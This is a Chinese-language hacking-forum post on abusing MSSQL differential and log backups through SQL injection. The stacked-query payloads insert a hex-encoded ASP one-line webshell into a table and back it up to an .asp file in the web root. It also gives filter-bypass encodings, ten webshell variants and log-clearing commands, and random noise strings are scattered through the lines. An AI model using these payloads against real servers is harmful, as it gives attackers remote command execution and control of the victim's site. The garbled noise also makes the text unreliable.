MSsql差异备份总结

admin

差异备份的流程大概这样：
3 V) G. q+ x: g: Q6 b  p1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
# L* X4 b& H1 w- P- r7 ~insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
/ b- P; @) _+ I* V& J3 R
5 @; M9 S7 C% B( e3 M" j& W$ Y3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
0x3C25657865637574652872657175657374282261222929253E
4 H# K0 @; I* _: M0 r就是一句话木马的内容：<%execute(request("a"))%>
- x5 i3 ~5 Y& e1 x8 x) F* p
1 u1 d# u. X. {9 M* G如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

6 a; N. _6 Y+ G- B4 h1 Y) Q. Y3 Ddeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

) f- J7 \, U* d2 y
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

; u5 G. G) S: m$ l8 ?9 Vdrop table [xiaolu]  -- 删除此表。
# y3 L4 ^0 ^9 i
% c7 i1 _! K. y6 M$ M0x77006F006B0061006F002E00620061006B00为wokao.bak
; O9 b3 W9 o- j- D: _0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
( |1 C$ F  Y, |===============================================================
6 f6 h; P/ P* I" L: g
我发现上面代码，有时会无效，而直接用
; C+ b3 ~4 g1 Y
backup database 库名 to disk = 'c:\ddd.bak'
* ]" _. \2 d1 S  b- q8 t' @3 y
create table [dbo].[dtest] ([cmd] [image]);
2 U9 q8 b/ }4 N7 ~1 V& A
$ c: u. z" M6 e+ y; o" i: finsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
+ S- ~; G! X' t, e9 V
- D* s/ ~% V6 i  @  q9 J* ~却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

% o, a/ u% h6 D, w' {网上还有log增量备份的，我也把他记录一下
) g1 V- A  L4 s5 j=====================================================
! x1 x4 F9 {0 s4 S3 P. [另一种log增量备份技术:

8 _% f6 l: `  W% \7 C';alter database null set RECOVERY FULL--

$ d4 D% E" z4 N8 |';create table cmd (a image)--

6 P0 l* W$ i& _- s, H';backup log null to disk = 'f:\cmd' with init--
! M& S! y6 B  Q$ P! m& B& ?
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

; O+ t, n- e5 y7 x& I# ~';backup log null to disk = '备份路径'--
, c4 W+ [9 |4 H1 R
';drop table cmd--
8 {4 O2 P8 b1 |! a  A3 ^
';alter database XXX set RECOVERY SIMPLE--
& `& L4 J  `1 _/ s9 m
PS:0x3C2565786563757465287265717565737428226122292
+ Q8 B7 }4 B* a7 v6 i9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：

a)<%%25Execute(request("a"))%%25>
4 O7 x% x- [+ M' E, r8 mb)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
* X' @0 H1 q3 Q7 F: _0 ]g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
6 c3 Z) [) h7 P% ]' |+ a0 sh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
; f' Y( q3 I: p$ KI)<%eval request(0)%>
/ |. j. m; y7 g# E% ^J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
+ {& u% m  B4 g/ V* @
' {5 ?8 _9 h) Y=============================================
) T0 F3 s2 d4 O' U* L5 k
当遇到差备过滤了/时用这个语句代替

7 i, L, Z. b' F# \9 Cdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
, V- I" W3 N5 q6 T) a
把要执行的语句转16进制然后用exec执行


减少备份文件大小方法如下:

: B6 N* o' s* y: X. w% [: L/ ]7 u总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
  K' c% u- k2 k+ c2 r2
" ?* ^/ {6 c/ F4 Rid=1;backup database model to disk='你的路径‘ with differential,format;--
* ?5 W* o' y+ d# w* D/ X6 g8 a
9 n. L0 d# x$ T
7 v7 [' e* X1 t4 U; g. o
SQL语句清理日志
# k8 B6 w+ |5 J, H# Z5 ]6 O+ i注：test为数据库名
. ]; t2 R( f' T  b- u
--清空日志
" l/ S0 K' \3 |DUMP TRANSACTION test WITH NO_LOG
' j# d) C' e( C3 G2 ?
0 s6 U, M$ i- b- P! R--截断事务日志
BACKUP LOG test WITH NO_LOG

3 X2 |5 ~0 j- O- e& P1 E; O( S--收缩数据库
( ?( Q- G1 P% X! `* C6 @9 m9 d' o% xDBCC SHRINKDATABASE(test)

7 m& k8 s6 L! H3 i0 _# U9 |/ L  y--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
- S- h: S8 h& ]2 l  g' c- SEXEC sp_dboption 'test', 'autoshrink', 'TRUE'